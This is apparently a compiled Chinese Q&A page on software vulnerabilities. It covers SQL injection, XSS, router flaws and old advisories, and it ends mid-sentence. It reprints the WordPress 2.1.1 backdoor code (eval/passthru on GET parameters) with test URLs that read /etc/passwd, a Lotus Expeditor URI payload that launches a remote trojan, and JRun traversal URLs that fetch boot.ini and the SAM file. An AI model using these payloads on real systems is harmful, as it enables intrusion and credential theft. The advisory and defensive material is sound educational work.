任意命令執行漏洞

㈠ 發現 iis 伺服器的http.sys整數溢出，任意代碼執行漏洞.怎麼驗證

進行信息通訊。微軟在 Windows 2003 Server 里引進了新的 HTTP API 和內核模式驅動Http.sys，目的是使基於 Http 服務的程序更有效率。其實在 Windows XP 安裝 SP2 後，Http.sys 已經出現在系統里了，但事實上操作系統並沒有真的使用這個內核級驅動，而 XP 上自帶的 IIS 5.1 也沒有使用 HTTP API。
從曝出的 POC 來看，此漏洞是一個整數溢出類型的漏洞，微軟安全公告稱最大安全影響是遠程執行代碼。

㈡ 常見的漏洞類型有哪些

一、SQL 注入漏洞

SQL 注入攻擊（ SQL Injection ），簡稱注入攻擊、SQL 注入，被廣泛用於非法獲取網站控制權， 是發生在應用程序的資料庫層上的安全漏洞。在設計程序，忽略了對輸入字元串中夾帶的SQL 指令的檢查，被資料庫誤認為是正常的SQL 指令而運行，從而使資料庫受到攻擊，可能導致數據被竊取、更改、刪除，以及進一步導致網站被嵌入惡意代碼、被植入後門程序等危害。

通常情況下， SQL 注入的位置包括：

（1）表單提交，主要是POST 請求，也包括GET 請求；

（2）URL 參數提交，主要為GET 請求參數；

（3）Cookie 參數提交；

（4）HTTP 請求頭部的一些可修改的值，比如Referer 、User_Agent 等；

（5）一些邊緣的輸入點，比如.mp3 文件的一些文件信息等。

SQL 注入的危害不僅體現在資料庫層面上， 還有可能危及承載資料庫的操作系統；如果SQL 注入被用來掛馬，還可能用來傳播惡意軟體等，這些危害包括但不局限於：

（1）資料庫信息泄漏：資料庫中存放的用戶的隱私信息的泄露。作為數據的存儲中心，資料庫里往往保存著各類的隱私信息， SQL 注入攻擊能導致這些隱私信息透明於攻擊者。

（2）網頁篡改：通過操作資料庫對特定網頁進行篡改。

（3）網站被掛馬，傳播惡意軟體：修改資料庫一些欄位的值，嵌入網馬鏈接，進行掛馬攻擊。

（4）資料庫被惡意操作：資料庫伺服器被攻擊，資料庫的系統管理員帳戶被篡改。

（5）伺服器被遠程式控制制，被安裝後門。經由資料庫伺服器提供的操作系統支持，讓黑客得以修改或控制操作系統。

（6）破壞硬碟數據，癱瘓全系統。

解決SQL 注入問題的關鍵是對所有可能來自用戶輸入的數據進行嚴格的檢查、對資料庫配置使用最小許可權原則。通常使用的方案有：

（1 ）所有的查詢語句都使用資料庫提供的參數化查詢介面，參數化的語句使用參數而不是將用戶輸入變數嵌入到SQL 語句中。當前幾乎所有的資料庫系統都提供了參數化SQL 語句執行介面，使用此介面可以非常有效的防止SQL 注入攻擊。

（2 ）對進入資料庫的特殊字元（ '"<>&*; 等）進行轉義處理，或編碼轉換。

（3 ）確認每種數據的類型，比如數字型的數據就必須是數字，資料庫中的存儲欄位必須對應為int 型。

（4）數據長度應該嚴格規定，能在一定程度上防止比較長的SQL 注入語句無法正確執行。

（5）網站每個數據層的編碼統一，建議全部使用UTF-8 編碼，上下層編碼不一致有可能導致一些過濾模型被繞過。

（6）嚴格限制網站用戶的資料庫的操作許可權，給此用戶提供僅僅能夠滿足其工作的許可權，從而最大限度的減少注入攻擊對資料庫的危害。

（7）避免網站顯示SQL 錯誤信息，比如類型錯誤、欄位不匹配等，防止攻擊者利用這些錯誤信息進行一些判斷。

（8）在網站發布之前建議使用一些專業的SQL 注入檢測工具進行檢測，及時修補這些SQL 注入漏洞。

二、跨站腳本漏洞

跨站腳本攻擊（ Cross-site scripting ，通常簡稱為XSS）發生在客戶端，可被用於進行竊取隱私、釣魚欺騙、竊取密碼、傳播惡意代碼等攻擊。XSS 攻擊使用到的技術主要為HTML 和Javascript ，也包括VBScript和ActionScript 等。XSS 攻擊對WEB 伺服器雖無直接危害，但是它藉助網站進行傳播，使網站的使用用戶受到攻擊，導致網站用戶帳號被竊取，從而對網站也產生了較嚴重的危害。

XSS 類型包括：

（1）非持久型跨站： 即反射型跨站腳本漏洞， 是目前最普遍的跨站類型。跨站代碼一般存在於鏈接中，請求這樣的鏈接時，跨站代碼經過服務端反射回來，這類跨站的代碼不存儲到服務端（比如資料庫中）。上面章節所舉的例子就是這類情況。

（2）持久型跨站：這是危害最直接的跨站類型，跨站代碼存儲於服務端（比如資料庫中）。常見情況是某用戶在論壇發貼，如果論壇沒有過濾用戶輸入的Javascript 代碼數據，就會導致其他瀏覽此貼的用戶的瀏覽器會執行發貼人所嵌入的Javascript 代碼。

（3）DOM 跨站（DOM XSS ）：是一種發生在客戶端DOM （Document Object Model 文檔對象模型）中的跨站漏洞，很大原因是因為客戶端腳本處理邏輯導致的安全問題。

XSS 的危害包括：

（1）釣魚欺騙：最典型的就是利用目標網站的反射型跨站腳本漏洞將目標網站重定向到釣魚網站，或者注入釣魚JavaScript 以監控目標網站的表單輸入，甚至發起基於DHTML 更高級的釣魚攻擊方式。

（2 ）網站掛馬：跨站時利用IFrame 嵌入隱藏的惡意網站或者將被攻擊者定向到惡意網站上，或者彈出惡意網站窗口等方式都可以進行掛馬攻擊。

（3）身份盜用： Cookie 是用戶對於特定網站的身份驗證標志， XSS 可以盜取到用戶的Cookie ，從而利用該Cookie 盜取用戶對該網站的操作許可權。如果一個網站管理員用戶Cookie 被竊取，將會對網站引發巨大的危害。

（4）盜取網站用戶信息：當能夠竊取到用戶Cookie 從而獲取到用戶身份使，攻擊者可以獲取到用戶對網站的操作許可權，從而查看用戶隱私信息。

（5）垃圾信息發送：比如在SNS 社區中，利用XSS 漏洞借用被攻擊者的身份發送大量的垃圾信息給特定的目標群。

（6）劫持用戶Web 行為：一些高級的XSS 攻擊甚至可以劫持用戶的Web 行為，監視用戶的瀏覽歷史，發送與接收的數據等等。

（7）XSS 蠕蟲：XSS 蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網上數據、實施DDoS 攻擊等。

常用的防止XSS 技術包括：

（1）與SQL 注入防護的建議一樣，假定所有輸入都是可疑的，必須對所有輸入中的script 、iframe 等字樣進行嚴格的檢查。這里的輸入不僅僅是用戶可以直接交互的輸入介面，也包括HTTP 請求中的Cookie 中的變數， HTTP 請求頭部中的變數等。

（2 ）不僅要驗證數據的類型，還要驗證其格式、長度、范圍和內容。

（3）不要僅僅在客戶端做數據的驗證與過濾，關鍵的過濾步驟在服務端進行。

（ 4）對輸出的數據也要檢查， 資料庫里的值有可能會在一個大網站的多處都有輸出，即使在輸入做了編碼等操作，在各處的輸出點時也要進行安全檢查。

（5）在發布應用程序之前測試所有已知的威脅。

三、弱口令漏洞

弱口令(weak password) 沒有嚴格和准確的定義，通常認為容易被別人（他們有可能對你很了解）猜測到或被破解工具破解的口令均為弱口令。設置密碼通常遵循以下原則：

（1）不使用空口令或系統預設的口令，這些口令眾所周之，為典型的弱口令。

（2）口令長度不小於8 個字元。

（3）口令不應該為連續的某個字元（例如： AAAAAAAA ）或重復某些字元的組合（例如： tzf.tzf. ）。

（4）口令應該為以下四類字元的組合，大寫字母(A-Z) 、小寫字母(a-z) 、數字(0-9) 和特殊字元。每類字元至少包含一個。如果某類字元只包含一個，那麼該字元不應為首字元或尾字元。

（5）口令中不應包含本人、父母、子女和配偶的姓名和出生日期、紀念日期、登錄名、E-mail 地址等等與本人有關的信息，以及字典中的單詞。

（6）口令不應該為用數字或符號代替某些字母的單詞。

（7）口令應該易記且可以快速輸入，防止他人從你身後很容易看到你的輸入。

（8）至少90 天內更換一次口令，防止未被發現的入侵者繼續使用該口令。

四、HTTP 報頭追蹤漏洞

HTTP/1.1 （RFC2616 ）規范定義了HTTP TRACE 方法，主要是用於客戶端通過向Web 伺服器提交TRACE 請求來進行測試或獲得診斷信息。當Web 伺服器啟用TRACE 時，提交的請求頭會在伺服器響應的內容（Body ）中完整的返回，其中HTTP 頭很可能包括Session Token 、Cookies 或其它認證信息。攻擊者可以利用此漏洞來欺騙合法用戶並得到他們的私人信息。該漏洞往往與其它方式配合來進行有效攻擊，由於HTTP TRACE 請求可以通過客戶瀏覽器腳本發起（如XMLHttpRequest ），並可以通過DOM 介面來訪問，因此很容易被攻擊者利用。防禦HTTP 報頭追蹤漏洞的方法通常禁用HTTP TRACE 方法。

五、Struts2 遠程命令執行漏洞

Apache Struts 是一款建立Java web 應用程序的開放源代碼架構。Apache Struts 存在一個輸入過濾錯誤，如果遇到轉換錯誤可被利用注入和執行任意Java 代碼。網站存在遠程代碼執行漏洞的大部分原因是由於網站採用了Apache Struts Xwork 作為網站應用框架，由於該軟體存在遠程代碼執高危漏洞，導致網站面臨安全風險。CNVD 處置過諸多此類漏洞，例如：「 GPS 車載衛星定位系統」網站存在遠程命令執行漏洞(CNVD-2012-13934) ；Aspcms 留言本遠程代碼執行漏洞（ CNVD-2012-11590 ）等。

修復此類漏洞，只需到Apache 官網升級Apache Struts 到最新版本

六、框架釣魚漏洞（框架注入漏洞）

框架注入攻擊是針對Internet Explorer 5 、Internet Explorer 6 、與Internet Explorer 7 攻擊的一種。這種攻擊導致Internet Explorer 不檢查結果框架的目的網站，因而允許任意代碼像Javascript 或者VBScript 跨框架存取。這種攻擊也發生在代碼透過多框架注入，肇因於腳本並不確認來自多框架的輸入。這種其他形式的框架注入會影響所有的不確認不受信任輸入的各廠商瀏覽器和腳本。如果應用程序不要求不同的框架互相通信，就可以通過完全刪除框架名稱、使用匿名框架防止框架注入。但是，因為應用程序通常都要求框架之間相互通信，因此這種方法並不可行。因此，通常使用命名框架，但在每個會話中使用不同的框架，並且使用無法預測的名稱。一種可行的方法是在每個基本的框架名稱後附加用戶的會話令牌，如main_display 。

七、文件上傳漏洞

文件上傳漏洞通常由於網頁代碼中的文件上傳路徑變數過濾不嚴造成的，如果文件上傳功能實現代碼沒有嚴格限制用戶上傳的文件後綴以及文件類型，攻擊者可通過Web 訪問的目錄上傳任意文件，包括網站後門文件（ webshell ），進而遠程式控制制網站伺服器。因此，在開發網站及應用程序過程中，需嚴格限制和校驗上傳的文件，禁止上傳惡意代碼的文件。同時限制相關目錄的執行許可權，防範webshell 攻擊。

八、應用程序測試腳本泄露

由於測試腳本對提交的參數數據缺少充分過濾，遠程攻擊者可以利用洞以WEB 進程許可權在系統上查看任意文件內容。防禦此類漏洞通常需嚴格過濾提交的數據，有效檢測攻擊。

九、私有IP 地址泄露漏洞

IP 地址是網路用戶的重要標示，是攻擊者進行攻擊前需要了解的。獲取的方法較多，攻擊者也會因不同的網路情況採取不同的方法，如：在區域網內使用Ping 指令， Ping 對方在網路中的名稱而獲得IP；在Internet 上使用IP 版的QQ直接顯示。最有效的辦法是截獲並分析對方的網路數據包。攻擊者可以找到並直接通過軟體解析截獲後的數據包的IP 包頭信息，再根據這些信息了解具體的IP。針對最有效的「數據包分析方法」而言，就可以安裝能夠自動去掉發送數據包包頭IP 信息的一些軟體。不過使用這些軟體有些缺點， 譬如：耗費資源嚴重，降低計算機性能；訪問一些論壇或者網站時會受影響；不適合網吧用戶使用等等。現在的個人用戶採用最普及隱藏IP 的方法應該是使用代理，由於使用代理伺服器後，「轉址服務」會對發送出去的數據包有所修改，致使「數據包分析」的方法失效。一些容易泄漏用戶IP 的網路軟體(QQ 、MSN 、IE 等)都支持使用代理方式連接Internet ，特別是QQ 使用「 ezProxy 」等代理軟體連接後， IP 版的QQ 都無法顯示該IP 地址。雖然代理可以有效地隱藏用戶IP，但攻擊者亦可以繞過代理， 查找到對方的真實IP 地址，用戶在何種情況下使用何種方法隱藏IP，也要因情況而論。

十、未加密登錄請求

由於Web 配置不安全， 登陸請求把諸如用戶名和密碼等敏感欄位未加密進行傳輸， 攻擊者可以竊聽網路以劫獲這些敏感信息。建議進行例如SSH 等的加密後再傳輸。

十一、敏感信息泄露漏洞

SQL 注入、XSS、目錄遍歷、弱口令等均可導致敏感信息泄露，攻擊者可以通過漏洞獲得敏感信息。針對不同成因，防禦方式不同。

㈢ 如何修復Python任意命令執行漏洞

打開騰訊電腦管家——工具箱——修復漏洞，進行漏洞掃描和修復。
建議設置開啟自動修復漏洞功能，開啟後，電腦管家可以在發現高危漏洞（僅包括高危漏洞，不包括其它漏洞）時，第一時間自動進行修復，無需用戶參與，最大程度保證用戶電腦安全。尤其適合老人、小孩或計算機初級水平用戶使用。開啟方式如下：進入電腦管家「修復漏洞」模塊—「設置」，點擊開啟自動修復漏洞即可。

㈣ kB370020 Adobe Flash player遠程代碼執行漏洞

是一個不小的漏洞了，對方可以通過這個漏洞加上幾個提升許可權工具就可以遠程在你的電腦里執行任意命令，360可以檢測出來，修復。

㈤ Wordpress 2.1.1遠程命令執行後門漏洞

他受影響系統是：
WordPress WordPress 2.1.1
描述：
BUGTRAQ ID: 22797

WordPress是一款免費的論壇Blog系統。

WordPress提供軟體下載的網站被入侵，入侵者修改了軟體代碼碼植入遠程可執行命令的後門，遠程攻擊者可能利用這個後門以Web進程許可權在安裝了惡意版本WordPress的伺服器上執行任意命令。

被修改的文件是wp-includes/feed.php和wp-includes/theme.php，被添加了如下代碼：

在wp-includes/feed.php文件中：

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

eval()調用會執行通過ix變數傳入的PHP代碼。

在wp-includes/theme.php文件中：

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

passthru()會執行通過iz變數傳入的PHP代碼。

<*來源：Ivan Fratric

鏈接：http://secunia.com/advisories/24374/
http://wordpress.org/development/2007/03/upgrade-212/
http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html
*>

測試方法：
--------------------------------------------------------------------------------

提示：

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

http://wordpressurl/wp-includes/feed.php?ix=phpinfo()
http://wordpressurl/wp-includes/theme.php?iz=cat/etc/passwd

㈥ 路由器漏洞有哪些

1.最難修補的漏洞：厄運餅干漏洞
上榜理由：12年補不上，黑客可以為所欲為
Check Point近日發現了一個影響極大的路由漏洞，並命名為「厄運餅干(Misfortune Cookie)」。該漏洞影響了20餘家路由廠商生產的至少1200萬台路由，其中包括有TP-Link、D-Link等知名廠商。
通過厄運餅干漏洞，黑客能夠監控一切通過與路由器進行連接的設備的所有數據，包括文件、電子郵件、登錄信息等，在監控的同時還能在這些數據當中植入惡意軟體。
厄運餅干是在一個提供Web伺服器服務的RomPager組件上發現的，該組件是由Allegro Software公司研發的。Allegro Software公司回應稱，厄運餅干漏洞是一個12年前的bug，並在9年前被修復，但Allegro的許多客戶並沒有更新漏洞補丁。
02class
2.影響最廣的漏洞：UPnP協議漏洞
上榜理由：禍及1500個供應商、6900款產品、近5000萬台設備
路由器和其他網路設備是導致用戶個人設備極易受到攻擊的根源，因為它們都普遍採用了即插即用(Universal Plug and Play，UPnP)技術，以便讓網路更加便捷地識別外部設備並與之進行通訊。
但Rapid7的研究人員從即插即用技術標准中發現了三種相互獨立的漏洞，超過1500個供應商和6900款產品都有一個以上這樣的安全漏洞，導致全球4,000萬到5,000萬台設備極易受到攻擊。這些設備的名單中包括數家全球知名網路設備生產商的產品，比如Belkin、D-Link以及思科旗下的Linksys和Netgear。
除非被修補，否則這些漏洞會讓黑客輕易的訪問到機密商業文件和密碼，或者允許他們遠程式控制制列印機和網路攝像頭。
03class
3.最狡猾的漏洞：NAT-PMP協議漏洞
上榜理由：1200萬路由器都是替罪羊
NAT-PMP(網路地址埠映射協議)是一個適用於網路設備的埠映射協議，允許外部用戶訪問文件共享服務，以及NAT協議下的其他內部服務。
RFC-6886即NAT-PMP的協議規范，特別指明NAT網關不能接受外網的地址映射請求，但一些廠商並沒有遵守這個規定，導致出現NAT-PMP協議設計不當漏洞，將影響超過1200萬台路由器設備。
漏洞將使黑客在路由器上運行惡意命令，會把你的系統變成黑客的反彈代理服務的工具，或者用你的路由IP託管惡意網站。
04class
4.最麻煩的漏洞：32764埠後門
上榜理由：路由器還在，管理員密碼沒了
法國軟體工程EloiVanderbeken發現了可以重置管理員密碼的後門——「TCP 32764」。利用該後門漏洞，未授權的攻擊者可以通過該埠訪問設備，以管理員許可權在受影響設備上執行設置內置操作系統指令，進而取得設備的控制權。
Linksys、Netgear、Cisco和Diamond的多款路由器均存在該後門。
05class
5.最懂傳播的漏洞：Linksys固件漏洞
上榜理由：被感染蠕蟲，還幫蠕蟲傳播
因為路由器的固件版本存在漏洞，Cisco Linksys E4200、E3200、E3000、E2500、E2100L、E2000、E1550、E1500、E1200、E1000、E900等型號都存在被蠕蟲The Moon感染的風險。
The Moon蠕蟲內置了大約670個不同國家的家用網段，一旦路由器被該蠕蟲感染，就會掃描其他IP地址。被感染的路由器還會在短時間內會作為http伺服器，供其他被感染的路由器下載蠕蟲代碼。
06class
6.最自由的漏洞：TP-Link路由器漏洞
上榜理由：無需授權認證
國內漏洞平台烏雲爆出了一個TP-Link路由器的漏洞(CNVD-2013-20783)。TP-Link部分型號的路由器存在某個無需授權認證的特定功能頁面(start_art.html)，攻擊者訪問頁面之後可引導路由器自動從攻擊者控制的TFTP伺服器下載惡意程序,並以root許可權執行。
攻擊者利用這個漏洞可以在路由器上以root身份執行任意命令，從而可完全控制路由器。
目前已知受影響的路由器型號包括TL-WDR4300、TL-WR743ND (v1.2 v2.0)、TL-WR941N，其他型號也可能受到影響。
07class
7.最趕時髦的漏洞：華碩路由器AiCloud漏洞
上榜理由：搭上了「雲端應用」熱點
華碩路由器存在嚴重安全問題，可以被遠程利用，並且完全控制路由器。漏洞存在AiCloud媒體伺服器上，這是華碩推出的一款雲端服務產品，在多款路由器上搭載了AiCloud的雲端應用。
攻擊者可以使用這些憑據來訪問連接路由器上USB埠的存儲設備，也可以訪問其他計算機上的共享文件。該漏洞還允許遠程寫文件，並且可以建立以個VPN隧道，還可以通過路由器獲取所有的網路流量。
08class
8.最會發揮的漏洞：小米路由器漏洞
上榜理由：可以執行管理平台沒有的系統命令
小米路由器正式發售時，系統版本0.4.68爆出一個任意命令執行漏洞。當用戶使用較弱的路由器管理密碼或在線登錄路由器管理平台時，攻擊者可以通過訪問特定頁面讓小米路由器執行任意系統命令，完全控制小米路由器。
家用路由器安全之道
當路由器被爆出各種漏洞後，路由器廠商通常會在其官網上發布固件(路由器的操作系統)的升級版本。但因為大部分普通用戶在購買家用路由器後，都沒有定期升級路由器固件版本的習慣，而路由器廠商也無法主動向用戶推送固件升級包，安全軟體也很少有可以給路由器打補丁的，這就導致路由器的安全漏洞被曝光後，很難得到及時的修復，因此存在巨大的安全隱患。
為了避免不必要的損失，建議家庭用戶：
1.養成定期升級固件系統的習慣，最好是去路由器廠商官網升級固件，也可以選擇一些可靠的第三方工具輔助升級固件系統。例如使用360路由器衛士檢測和修復路由器後門漏洞，預防路由器被黑客劫持。
2.及時修改路由器的默認管理密碼，盡量使用10位以上的復雜密碼，最好是「大小寫字母+數字+特殊符號」的組合。
3.WiFi以WPA/WPA2加密認證方式設置高強度密碼，並關閉路由器的WPS/QSS功能，以免被他人蹭網後威脅整個家庭網路的安全。

㈦ 常見的網路安全漏洞有哪些

第一：注入漏洞
由於其普遍性和嚴重性，注入漏洞位居漏洞排名第一位。常見的注入漏洞包括SQL、LDAP、OS命令、ORM和OGML。用戶可以通過任何輸入點輸入構建的惡意代碼，如果應用程序沒有嚴格過濾用戶的輸入，一旦輸入的惡意代碼作為命令或者查詢的一部分被發送到解析器，就可能導致注入漏洞。
第二：跨站腳本漏洞
XSS漏洞的全稱是跨站點腳本漏洞。XSS漏洞是網路應用程序中常見的安全漏洞，它允許用戶將惡意代碼植入網頁，當其他用戶訪問此頁面時，植入的惡意腳本將在其他用戶的客戶端執行。危害有很多，客戶端用戶的信息可以通過XSS漏洞獲取，比如用戶登錄的Cookie信息;信息可以通過XSS蝸牛傳播;木馬可以植入客戶端;可以結合其他漏洞攻擊伺服器，並在伺服器中植入特洛伊木馬。
第三、文件上傳漏洞
造成文件上傳漏洞的主要原因是應用程序中有上傳功能，但上傳的文件沒有通過嚴格的合法性檢查或者檢查功能有缺陷，導致木馬文件上傳到伺服器。文件上傳漏洞危害極大，因為惡意代碼可以直接上傳到伺服器，可能造成伺服器網頁修改、網站暫停、伺服器遠程式控制制、後門安裝等嚴重後果。
第四、文件包含漏洞
文件包含漏洞中包含的文件參數沒有過濾或嚴格定義，參數可以由用戶控制，可能包含意外文件。如果文件中存在惡意代碼，無論文件是什麼後綴類型，文件中的惡意代碼都會被解析執行，導致文件包含漏洞。
第五、命令執行漏洞
應用程序的某些函數需要調用可以執行系統命令的函數。如果這些功能或者功能的參數可以被用戶控制，那麼惡意的命令就有可能通過命令連接器拼接成正常的功能，從而可以隨意執行系統命令。這就是命令執行漏洞，屬於高風險漏洞之一。

㈧ IBM Lotus Expeditor URI處理器命令執行漏洞

受影響系統：
IBM Lotus Expeditor
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 28926

Lotus Expeditor之前名為IBM WebSphere Everyplace Deployment，是用於創建、部署和維護各種應用的管理客戶端。

Lotus expeditor中的rcplauncher（由lotus symphony套件安裝）進程注冊了一個cai: uri處理器。由於rcplauncher進程會接受各種參數，因此可能被濫用執行任意代碼。例如，-launcher選項參數會執行可執行程序。

<*來源：Thomas Pollet

鏈接：http://marc.info/?l=full-disclosure&m=120904651132048&w=2
*>

測試方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！

cai:"%20-launcher%20\\6.6.6.6\d$\trojan

建議：
--------------------------------------------------------------------------------
廠商補丁：

IBM
---
目前廠商還沒有提供補丁或者升級程序，我們建議使用此軟體的用戶隨時關注廠商的主頁以獲取最新版本：

http://www-128.ibm.com/developerworks/lotus/procts/expeditor/

㈨ jsp有哪些漏洞

JSP漏洞大觀
Apache泄露重寫的任意文件漏洞是怎麼回事？

在Apache1.2以及以後的版本中存在一個mod_rewrite模塊，它用來指定特殊URLS在網路伺服器文件系統上所映射的絕對路徑。如果傳送一個包含正確表達參數的重寫規則，攻擊者就可以查看目標主機上的任意文件。

下面舉例說明重寫規則指令（其中第一行只有是包含漏洞的）：

RewriteRule /test/(.*) /usr/local/data/test-stuff/$1
RewriteRule /more-icons/(.*) /icons/$1
RewriteRule /go/(.*) http://www.apacheweek.com/$1

受影響的系統：

1）Apache 1.3.12
2）Apache 1.3.11win32
3）Apache 1.2.x

不受影響系統：Apache 1.3.13

怎樣解決在HTTP請求中添加特殊字元導致暴露JSP源代碼文件？
Unify eWave ServletExec 是一個 Java/Java Servlet 引擎插件，主要用於 WEB 伺服器，例如：Microsoft IIS, Apache, Netscape Enterprise 伺服器等等。
當一個 HTTP 請求中添加下列字元之一，ServletExec 將返回 JSP 源代碼文件。
.

%2E
+
%2B
\
%5C
%20
%00
成功的利用該漏洞將導致泄露指定的JSP文件的源代碼，例如：使用下面的任意一個URL請求將輸出指定的JSP文件的源代碼：

1）http://target/directory/jsp/file.jsp.
2）http://target/directory/jsp/file.jsp%2E
3）http://target/directory/jsp/file.jsp+
4）http://target/directory/jsp/file.jsp%2B
5）http://target/directory/jsp/file.jsp\
6）http://target/directory/jsp/file.jsp%5C
7）http://target/directory/jsp/file.jsp%20
8）http://target/directory/jsp/file.jsp%00

受影響的系統：

1）Unify eWave ServletExec 3.0c
2）Sun Solaris 8.0
3）Microsoft Windows 98
4）Microsoft Windows NT 4.0
5）Microsoft Windows NT 2000
6）Linux kernel 2.3.x
7）IBM AIX 4.3.2
8）HP HP-UX 11.4

解決方案：

如果沒有使用任何靜態頁面或圖像，可以配置一個默認的 servlet，並將"/"映射到這個默認的 servlet。這樣當收到一個未映射到某個 servlet 的 URL 時，這個默認的servlet 就會被調用。在這種情況下，默認的 servlet 可以僅僅返回"未找到文件"。如果使用了靜態的頁面或圖像，仍然可以作這樣的配置，但是需要讓這個默認的servlet 處理對合法的靜態頁面和圖像的請求。
另一種可能就是將*.jsp+、*.jsp.和*.jsp\等映射到一個 servlet，而該servlet只是返回"未找到文件"。對於*.jsp%00和*.jsp%20這樣的情況，映射應以未經編碼的形式輸入。例如，對於*.jsp%20的映射應輸入"*.jsp "。注意%20被轉換成一個空格字元。
Tomcat有哪些漏洞？

Tomcat 3.1 存在暴露網站路徑問題

Tomcat 3.1 是在 Apache 軟體環境下開發的一個支持 JSP 1.1 和 Servlets 2.2 的軟體。它存在一個安全問題當發送一個不存在的 jsp 請求時會暴露網站上網頁的全路徑。

舉例：
http://narco.guerrilla.sucks.co:8080/anything.jsp

結果顯示：
Error: 404
Location: /anything.jsp
JSP file "/appsrv2/jakarta-tomcat/webapps/ROOT/anything.jsp" not found

解決方案：升級到新版本

Tomcat 暴露JSP文件內容

Java Server Pages (JSP)類型的文件是以'.jsp'擴展名在Tomcat 上注冊，Tomcat 是文件名大小寫敏感的，'.jsp'和'.JSP'是不同類型的文件擴展名。如果提交有'.JSP'的鏈接給Tomcat,而Tomcat找不到'.JSP'就會以默認的'.text'文件類型來響應請求。因為在NT系統中大小寫文件名是非敏感的，所以被請求的文件會以文本的形式送出。

如果在UNIX伺服器上會出現"file not found"的錯誤信息。

如何在windows下對Tomcat實施代碼保護

Tomcat的一些版本有泄露源代碼的漏洞，如果在瀏覽器中調用JSP頁面時將該文件的後綴改成大寫，這個JSP文件的源代碼將完全輸出到瀏覽器中（也許瀏覽器窗口中什麼都沒有，這時你只需查看HTML源文件就可以發現）。如此一來，網站的源代碼是不是都會暴露在互聯網上那？
不用擔心，解決方法很簡單，把各種後綴的組合全部寫到Tomcat_Home\conf \web.xml里就可以了，這樣Tomcat會將不同後綴名的JSP分開對待，就不會泄露代碼了。

jsp
*.jsp

jsP
*.jsP

?lt;servlet-name> jSp
*.jSp

jSP
*.jSP

Jsp
*.Jsp

JsP
*.JsP

JSp
*.JSp

JSP
*.JSP

Allair Jrun漏洞有哪些漏洞？

Allair JRUN 非法讀取 WEB-INF 漏洞
在Allaire 的 JRUN 伺服器 2.3版本中存在一個嚴重的安全漏洞。它允許一個攻擊者在 JRun 3.0 伺服器中查看 WEB-INF 目錄。
如果用戶在提交 URL 請求時在，通過附加一個"/"使該 URL 成為畸形的 URL，這時 WEB-INF 下的所有子目錄將會暴露出來。攻擊者巧妙的利用該漏洞將能夠遠程獲得目標主機系統中 WEB-INF 目錄下的所有文件的讀取許可權。
例如使用下面這個 URL 將會暴露 WEB-INF 下的所有文件：
http://site.running.jrun:8100//WEB-INF/

受影響的系統：Allaire JRun 3.0

解決方案：下載並安裝補丁：

Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar
Allaire JRUN 2.3 查看任意文件漏洞

Allaire 的 JRUN 伺服器 2.3上存在多重顯示代碼漏洞。該漏洞允許攻擊者在 WEB 伺服器上查看根目錄下的任意文件的源代碼。
JRun 2.3 使用 Java Servlets 解析各種各樣類型的頁面（例如：HTML, JSP等等）。基於rules.properties 和 servlets.properties 的文件設置，可能利用URL前綴"/servlet/"調用任何servlet。
它可能使用 Jrun 的 SSIFilter servlet 在目標系統上檢索任意的文件。下列 2 個例子顯示出能被用來檢索任意的文件的 URLs ：

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../t est.jsp
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../../../../../../boot.ini
http://jrun:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../. ./../../../../winnt/repair/sam
http://jrun:8000/servlet/ssifilter/../../test.jsp
http://jrun:8000/servlet/ssifilter/../../../../../../../boot.ini
http://jrun:8000/servlet/ssifilter/../../../../../../../winnt/repair/sam._
注意：假設JRun在主機" jrun "上運行，埠8000。

受影響的系統：Allaire JRun 2.3.x

解決方案：下載並安裝補丁：

Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar Allaire JRUN 2.3遠程執行任意命令漏洞

Allaire 的 JRUN 伺服器 2.3上存在一個安全漏洞，允許遠程用戶把在 WEB 伺服器上的任意文件作為JSP代碼編譯/執行。 如果URL請求的目標文件使用了前綴"/servlet/"，則JSP解釋執行功能被激活。這時在用戶請求的目標文件路徑中使用"../"，就有可能訪問到 WEB 伺服器上根目錄以外的文件。在目標主機上利用該漏洞請求用戶輸入產生的一個文件，將嚴重威脅到目標主機系統的安全。

例如：

http://jrun:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../path/to /temp.txt
http://jrun:8000/servlet/jsp/../../path/to/temp.txt

受影響的系統：Allaire JRun 2.3.x

解決方案：下載並安裝補丁：

Allaire patch jr233p_ASB00_28_29
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip
Windows 95/98/NT/2000 and Windows NT Alpha
Allaire patch jr233p_ASB00_28_29tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz
UNIX/Linux patch - GNU gzip/tar
JRun 2.3.x 範例文件暴露站點安全信息

JRun 2.3.x 在 JRUN_HOME/servlets 目錄下有一些 servlet 範例文件，這個目錄是 JRun 2.3.x 用於載入和執行 servlets 文件。所有擴展名為 ".Java" 或 "class" 的文件必須被刪除，這是因為這些文件會暴露站點的安全信息。例如：
